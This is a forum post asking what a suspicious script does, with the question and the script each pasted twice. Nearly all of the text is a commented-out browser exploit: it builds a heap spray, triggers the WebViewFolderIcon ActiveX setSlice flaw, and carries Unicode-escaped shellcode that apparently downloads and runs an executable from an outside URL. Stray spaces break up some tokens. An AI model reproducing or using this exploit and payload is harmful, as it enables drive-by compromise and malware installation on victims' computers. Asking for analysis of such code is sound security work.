Could someone please give me some idea what this script is doing.
It might be some malicious script that might have been used to spread virus or to hack username/ password, hence it has been ### so that it can't be run by default.
thanks.
Vicky
<!-- <html>
###<body>
###<script>
### var heapSprayToAddr ess = 0x05050505;
### var shellcode = unescape("%u909 0"+"%u9090"+
###"%u54eb%u758 b%u8b3c%u3574%u 0378%u56f5%u768 b%u0320" +
###"%u33f5%u49c 9%uad41%udb33%u 0f36%u14be%u382 8%u74f2" +
###"%uc108%u0dc b%uda03%ueb40%u 3bef%u75df%u5ee 7%u5e8b" +
###"%u0324%u66d d%u0c8b%u8b4b%u 1c5e%udd03%u048 b%u038b" +
###"%uc3c5%u727 5%u6d6c%u6e6f%u 642e%u6c6c%u430 0%u5c3a" +
###"%u2e55%u786 5%u0065%uc033%u 0364%u3040%u0c7 8%u408b" +
###"%u8b0c%u1c7 0%u8bad%u0840%u 09eb%u408b%u8d3 4%u7c40" +
###"%u408b%u953 c%u8ebf%u0e4e%u e8ec%uff84%ufff f%uec83" +
###"%u8304%u242 c%uff3c%u95d0%u bf50%u1a36%u702 f%u6fe8" +
###"%uffff%u8bf f%u2454%u8dfc%u ba52%udb33%u535 3%ueb52" +
###"%u5324%ud0f f%ubf5d%ufe98%u 0e8a%u53e8%ufff f%u83ff" +
###"%u04ec%u2c8 3%u6224%ud0ff%u 7ebf%ue2d8%ue87 3%uff40" +
###"%uffff%uff5 2%ue8d0%uffd7%u ffff%u7468%u707 4%u2f3a" +
###"%u6d2f%u686 f%u6973%u776e%u 6265%u6973%u657 4%u632e" +
###"%u2e6f%u6b7 5%u622f%u6e69%u 3264%u652e%u657 8%u0000");
###var heapBlockSize = 0x400000;
###var payLoadSize = shellcode.lengt h * 2;
###var spraySlideSize = heapBlockSize - (payLoadSize+0x 38);
###var spraySlide = unescape("%u050 5%u0505");
###spraySlide = getSpraySlide(s praySlide,spray SlideSize);
###heapBlocks = (heapSprayToAdd ress - 0x400000)/heapBlockSize;
###memory = new Array();
###
###for (i=0;i<heapBloc ks;i++)
###{
### memory[i] = spraySlide + shellcode;
###}
###for ( i = 0 ; i < 128 ; i++)
###{
### try
### {
### var tar = new ActiveXObject(' WebViewFolderIc on.WebViewFolde rIcon.1');
### tar.setSlice(0x 7ffffffe, 0x05050505, 0x05050505,0x05 050505 );
### }
### catch(e){}
###}
###
###function getSpraySlide(s praySlide, spraySlideSize)
###{
### while (spraySlide.len gth*2<spraySlid eSize)
### {
### spraySlide += spraySlide;
### }
### spraySlide = spraySlide.subs tring(0,spraySl ideSize/2);
### return spraySlide;
###}
###
###</script>
###</body>
###</html>
### -->
It might be some malicious script that might have been used to spread virus or to hack username/ password, hence it has been ### so that it can't be run by default.
thanks.
Vicky
<!-- <html>
###<body>
###<script>
### var heapSprayToAddr ess = 0x05050505;
### var shellcode = unescape("%u909 0"+"%u9090"+
###"%u54eb%u758 b%u8b3c%u3574%u 0378%u56f5%u768 b%u0320" +
###"%u33f5%u49c 9%uad41%udb33%u 0f36%u14be%u382 8%u74f2" +
###"%uc108%u0dc b%uda03%ueb40%u 3bef%u75df%u5ee 7%u5e8b" +
###"%u0324%u66d d%u0c8b%u8b4b%u 1c5e%udd03%u048 b%u038b" +
###"%uc3c5%u727 5%u6d6c%u6e6f%u 642e%u6c6c%u430 0%u5c3a" +
###"%u2e55%u786 5%u0065%uc033%u 0364%u3040%u0c7 8%u408b" +
###"%u8b0c%u1c7 0%u8bad%u0840%u 09eb%u408b%u8d3 4%u7c40" +
###"%u408b%u953 c%u8ebf%u0e4e%u e8ec%uff84%ufff f%uec83" +
###"%u8304%u242 c%uff3c%u95d0%u bf50%u1a36%u702 f%u6fe8" +
###"%uffff%u8bf f%u2454%u8dfc%u ba52%udb33%u535 3%ueb52" +
###"%u5324%ud0f f%ubf5d%ufe98%u 0e8a%u53e8%ufff f%u83ff" +
###"%u04ec%u2c8 3%u6224%ud0ff%u 7ebf%ue2d8%ue87 3%uff40" +
###"%uffff%uff5 2%ue8d0%uffd7%u ffff%u7468%u707 4%u2f3a" +
###"%u6d2f%u686 f%u6973%u776e%u 6265%u6973%u657 4%u632e" +
###"%u2e6f%u6b7 5%u622f%u6e69%u 3264%u652e%u657 8%u0000");
###var heapBlockSize = 0x400000;
###var payLoadSize = shellcode.lengt h * 2;
###var spraySlideSize = heapBlockSize - (payLoadSize+0x 38);
###var spraySlide = unescape("%u050 5%u0505");
###spraySlide = getSpraySlide(s praySlide,spray SlideSize);
###heapBlocks = (heapSprayToAdd ress - 0x400000)/heapBlockSize;
###memory = new Array();
###
###for (i=0;i<heapBloc ks;i++)
###{
### memory[i] = spraySlide + shellcode;
###}
###for ( i = 0 ; i < 128 ; i++)
###{
### try
### {
### var tar = new ActiveXObject(' WebViewFolderIc on.WebViewFolde rIcon.1');
### tar.setSlice(0x 7ffffffe, 0x05050505, 0x05050505,0x05 050505 );
### }
### catch(e){}
###}
###
###function getSpraySlide(s praySlide, spraySlideSize)
###{
### while (spraySlide.len gth*2<spraySlid eSize)
### {
### spraySlide += spraySlide;
### }
### spraySlide = spraySlide.subs tring(0,spraySl ideSize/2);
### return spraySlide;
###}
###
###</script>
###</body>
###</html>
### -->
Comment